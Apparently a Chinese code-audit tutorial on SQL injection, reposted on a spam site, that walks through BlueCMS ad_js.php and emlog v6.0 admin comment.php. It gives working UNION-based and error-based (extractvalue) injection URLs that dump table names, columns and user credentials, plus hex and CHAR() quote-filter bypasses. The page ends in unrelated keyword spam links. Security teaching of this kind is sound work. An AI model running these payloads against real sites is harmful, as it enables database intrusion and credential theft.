当前位置: 首页 > wzjs >正文

通州网站制作济南网站优化培训

通州网站制作,济南网站优化培训,php做的大型网站有哪些,b2c商城网站前置知识: 漏洞形成的原因: 1、可控的参数 2、函数缺陷 代码审计的步骤: 1、全局使用正则搜索 漏洞函数 ,然后根据函数看变量是否可控,再看函数是否有过滤 2、根据web的功能点寻找函数,然后根据函数看…

前置知识:

漏洞形成的原因:

1、可控的参数 2、函数缺陷

代码审计的步骤:

1、全局使用正则搜索 漏洞函数 ,然后根据函数看变量是否可控,再看函数是否有过滤

2、根据web的功能点寻找函数,然后根据函数看变量是否可控,再看函数是否有过滤

sql注入代码前置知识

代码常见语句

-功能追踪-功能点文件SQL执行代码函数调用链追踪

-根据代码搜索-正则搜索-(update|select|insert|delete|).*?where.*=

(update|select|insert|delete|).*?where.*=

案例一:bluecms

案例使用的web全是纯手搓的项目 使用思路 1 先使用正则表达式 去查找对应的函数(代码审计就是 寻函数找方法)

全局使用正则去搜索

使用正则搜索的时候 发现这些有个目录的路径 : 我们需要看一下这些目录的作用 (可以查看里面的内容  或者是按照这个英文单词翻译)

那我们不需要找这些  admin 目录下的(影响比较鸡肋  后台内的sql注入需要有后台的权限)

挨个分析 一下  看看有没有过滤什么的

为了便于分析

加一个输出语句

找到漏洞语句 之后就看有没有回显

发现是有回显的  

但是下边有一个

if($ad['time_set'] == 0)  //如果广告设置了 ==0 表示永远有效
{$ad_content = $ad['content'];
}
else   // 否则 如果广告小于 广告商给的时间  就下架
{if($ad['end_time'] < time()){$ad_content = $ad['exp_content'];}else{$ad_content = $ad['content'];        //否则就显示内容}
}

这个进行搜索一下这个就是广告逻辑  设置广告 这个页面呢可能就是广告商页面  上边的参数可能就是从数据库中 找哪个广告

$ad_content = str_replace('"', '\"',$ad_content);  //对内容进行过滤  如果内容中有这些符号就会被替换
$ad_content = str_replace("\r", "\\r",$ad_content);
$ad_content = str_replace("\n", "\\n",$ad_content);
echo "<!--\r\ndocument.write(\"".$ad_content."\");\r\n-->\r\n";  // 输出内容  但是这个现实呢 是进行html注释的内容

这个思路就是根据代码函数找缺陷然后找到功能点的web页面

这个 ad_id 就是注入点

使用192.168.21.12:70/ad_js.php?ad_id=1 order by 7

进行产看是有 7个 查询列的  查看回显的时候要查看源代码

http://192.168.21.12:70/ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database();%20%23

有个小过滤

就是会过滤我们的 ''  ""  导致 where=""  失效  绕过手段

sql注入中字符串 "" 被过滤:

1、进行16进制编码

view-source:http://192.168.21.12:70/ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x626C75655F75736572%23

2、使用 char 进行拼接  char可以把ascii码转为字符串 blue_user 拼接 

CHAR(98,108,117,101,95,117,115,101,114)    b的ascii就是 98 
http://192.168.21.12:70/ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=CHAR(98,108,117,101,95,117,115,101,114)%23
http://192.168.21.12:70/ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,user_id,user_name%20from%20blue_user

案例二 : emlog v6.0版

这个的sql注入点在 后台 

(update|select|insert|delete|).*?where.*=
正则搜索一下

数据库监听脚本工具的使用

它的作用就是 可以监听我们进行访问web页面时触发的sql语句

基本使用

github上搜索 :MySQL-Monitor-master

在这个config下有泄露

玩法 : 访问后台

就三个语句

分析一下可能 这个就是查找用户的  所以我们根据这个功能 锁定一下代码

还有一层判断逻辑

$sql = "SELECT DISTINCT gid FROM ".DB_PREFIX."comment WHERE ip='$ip'";$ip = 1' and 1=1%23

http://192.168.21.12:70/admin/comment.php?action=delbyip&ip=1%27%20and%201=1%23

这个的验证

取一下token

http://192.168.21.12:70/admin/comment.php?action=delbyip&token=7371404e1fba139c96aa07029178fe70 and ip=1' order by 5%23是吧这个其实是不对的  需要把 token 放到后边的话需要进行  拼接   http://192.168.21.12:70/admin/comment.php?action=delby and ip=1' order by 5--+&token=7371404e1fba139c96aa07029178fe70--+ 拼接

?action=delbyip&ip=127.0.0.1%27and(extractvalue(1,concat(0x7e,(select%20user()),0x7e)))%20--+&token=7371404e1fba139c96aa07029178fe70extractvalue  :  执行xml语句使用xml的形式就是为了让他报错回显

http://www.dtcms.com/wzjs/120104.html

相关文章:

  • 面料 做网站seo快速提升排名
  • 滑动网站介绍网络营销的短文
  • 网站建设需要个体营业执照360推广登录平台
  • 陇南网站制作seo大牛
  • 做网站 违法百度推广外推联系方式
  • 虚拟主机怎么做网站百度贴吧广告投放
  • 免费做优化的网站建设品牌宣传策划公司
  • 张家港公司网站建设青山seo排名公司
  • 织梦 帝国 php cms 媒体网站 哪个八八网
  • 公司做网站费用和人员配备东莞seo建站如何推广
  • 网站导航结构12345微信公众号
  • 广州专业的网站开发公司建网站
  • wordpress 删除 下载石家庄seo排名公司
  • 建设网站价钱网站多少钱
  • 网站建设售后东莞百度网站排名优化
  • 企业网站建设方案书范文长沙seo外包平台
  • 网站侵权 做网站有责任吗深圳seo博客
  • 建个网站我在万网购买了一个域名接下来要怎么做淘宝关键词搜索排名
  • 管理网站建设公司好吗东莞网站优化公司哪家好
  • 网站优化 流量全媒体广告代理加盟
  • 企业营销策划哪个好点怎么学seo基础
  • 做盒饭的网站网上营销是干什么的
  • 汽车网站建设制作费用百度指数功能有哪些
  • 家具网站建设目的及功能定位网络整合营销理论案例
  • 网站开发后台做些什么可视化网页制作工具
  • 三国群英传私服网站怎么做数据分析网站
  • 网站代理服务器有问题今日重大国际新闻
  • 外包公司是做什么的seo咨询河北
  • 天津城市建设大学网站龙泉驿网站seo
  • 大型网站建设技巧亚马逊跨境电商个人开店